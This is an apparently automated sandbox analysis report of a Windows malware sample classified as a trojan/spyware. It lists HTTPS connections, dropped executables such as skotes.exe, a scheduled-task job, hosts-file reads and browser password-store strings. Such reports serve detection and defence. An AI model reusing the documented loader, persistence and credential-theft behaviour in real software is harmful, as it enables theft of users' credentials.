Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50251 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50196
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50251
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50253
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49955 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49990 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50104 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.53.14:443 -> 192.168.2.4:50166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.53.14:443 -> 192.168.2.4:50168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.4:50176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50179 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50180 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.53.14:443 -> 192.168.2.4:50187 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.20:443 -> 192.168.2.4:50196 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50203 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50205 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50204 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.15:443 -> 192.168.2.4:50231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50252 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 9afe8d29fa.exe, 0000000C.00000002.2768066825.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d8347e8b-1
Source: 9afe8d29fa.exe, 0000000C.00000002.2768066825.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_de1a4e6f-9
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: d0d78d3fdb.exe.6.dr Static PE information: section name:
Source: d0d78d3fdb.exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name:
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name: .rsrc
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name: .idata
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 2235d4f703.exe.6.dr Static PE information: section name:
Source: 2235d4f703.exe.6.dr Static PE information: section name: .idata
Source: 2235d4f703.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: 86526d7b20.exe.6.dr Static PE information: section name:
Source: 86526d7b20.exe.6.dr Static PE information: section name: .idata
Source: 86526d7b20.exe.6.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_0585F3EC 9_3_0585F3EC
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_05860186 9_3_05860186
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_0586013E 9_3_0586013E
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_05861003 9_3_05861003
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_013FDB79 11_3_013FDB79
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_013FDB79 11_3_013FDB79
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_013FDB79 11_3_013FDB79
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_013FDB79 11_3_013FDB79
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_013FDB79 11_3_013FDB79
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_013FDB79 11_3_013FDB79
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 11_3_05B01050 11_3_05B01050
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9983395776566758
Source: file.exe Static PE information: Section: mtubkuce ZLIB complexity 0.9943987498135441
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983395776566758
Source: skotes.exe.0.dr Static PE information: Section: mtubkuce ZLIB complexity 0.9943987498135441
Source: random[1].exe.6.dr Static PE information: Section: pablyzls ZLIB complexity 0.9944013021577593
Source: 2a8b7e5b78.exe.6.dr Static PE information: Section: pablyzls ZLIB complexity 0.9944013021577593
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9992827868852459
Source: random[1].exe0.6.dr Static PE information: Section: tbzxaang ZLIB complexity 0.9946771588848595
Source: 2235d4f703.exe.6.dr Static PE information: Section: ZLIB complexity 0.9992827868852459
Source: 2235d4f703.exe.6.dr Static PE information: Section: tbzxaang ZLIB complexity 0.9946771588848595
Source: random[1].exe1.6.dr Static PE information: Section: ldvhpekm ZLIB complexity 0.9950462282236451
Source: 86526d7b20.exe.6.dr Static PE information: Section: ldvhpekm ZLIB complexity 0.9950462282236451
Source: random[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 2a8b7e5b78.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@132/18@107/17
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2516:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 2235d4f703.exe, 00000009.00000003.2603346909.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2604182367.0000000005855000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2735373918.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 44%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 86526d7b20.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2235d4f703.exe String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
